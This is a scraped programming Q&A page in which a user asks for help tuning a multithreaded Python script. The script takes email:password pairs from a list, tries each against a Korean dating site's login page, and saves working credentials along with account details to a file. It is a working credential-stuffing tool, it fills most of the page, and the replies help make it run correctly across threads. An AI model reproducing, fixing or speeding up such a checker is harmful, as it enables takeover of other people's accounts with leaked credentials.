简体   繁体   中英

python thread queue question

Hell All.

i was made some python script with thread which checking some of account exist in some website

if i run thread 1 , it working well but if increase thread such like 3~5 and above,

result was very different compare with thread 1 and i was checked manually and

if i increase thread result was not correct.

i think some of my thread code have to tune or how about use Queue module ?

anyone can advice or tuneing my script? Thanks in advance!

# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time

# Maximum number of process to spawn at any one given time.
MAX_PROCS =5

maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread ( threading.Thread ):
 llemail = ""
 llpassword = ""
 def __init__ ( self , lemail, lpassword):
  self.llemail = lemail
  self.llpassword = lpassword
  threading.Thread.__init__( self )
  pass

 def run ( self ):
  valid = []
  llemail = self.llemail
  llpassword = self.llpassword 
  try:
   params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
   rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
   rs = mechanize.urlopen(rq)
   data = rs.read()      
   logged_in = r'var _id'  in data                    #정상 로그인                           
   if logged_in :
       rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
       rs = mechanize.urlopen(rq)
       maindata = rs.read(50024)
       jun_member = r"준회원"
       save = open(SAVEFILE, 'a')
       for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
        matched =  match.group(1)    
       for match2 in re.finditer(r"var _gd(.*?);", data):
        matched2 = match2.group(1)
        print '%s, %s' %(matched, matched2)  
        break
       rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
       rs1=mechanize.urlopen(rq1)
       sendmsg= rs1.read()
       #print sendmsg       
       match3 = ''
       for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
        matched3 = match3.group(1)
        #print matched3
        print 'bad'
        break
       if match3 =='':
        save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
        save.close()      
        print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)                
   else:
    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
    return 0              
  except:
   print '[!] Exception checking %s.' % (llemail)
   return 1
  return 0   
try:
 listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
 print '[!] %s does not exist. Please create the file!' % (maillist) 
 exit (2)

#Loop through the file
for line in listhandle:
 #Parse the line
 try:
  details = line.split(':')
  email = details[0]
  password = details[1].replace('\n', '')

 #Throw an error and exit.
 except:
  print '[!] Parse Error in %s on line %n.' % (maillist, currline)
  exit

 #Run a while statement:
 if len(threads) < MAX_PROCS:
  #Fork out into another process
  print '[ ] Starting thread to check account %s.' % (email);
  thread = CheckMyThread(email, password)
  thread.start()
  threads.append(thread)

 else:
  #Wait for a thread to exit.
  gonext = 0
  while 1 == 1:
   i = 0
   #print '[ ] Checking for a thread to exit...'
   while i < len(threads):
    #print '[ ] %d' % (i)
    try: 
     if threads[i]:
      if not threads[i].isAlive():
       #print '[-] Thread %d is dead' % (i)
       threads.pop(i)
       print '[ ] Starting thread to check account %s.' % (email);
       thread = CheckMyThread(email, password)
       thread.start() 
       threads.append(thread)
       gonext = 1
       break
      else:
       #print '[+] Thread %d is still running' % (i)
       pass
     else:
      print '[ ] Crap.'; 
    except NameError:
     print '[ ] AWWW COME ON!!!!'
    i = i + 1 
   time.sleep(0.050);
   if gonext:
    break

Can You please specify what are different results?

From what I see, code is doing much more than verifying account.

From what I see, You're appending to a single file from multiple threads, I'd say it's not thread-safe.

Also, AFAIK Mechanize uses shared cookie storage for all requests, so they are probably interfering. Use separate mechanize.Browser() inside run() instead of mechanize.Request() .

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM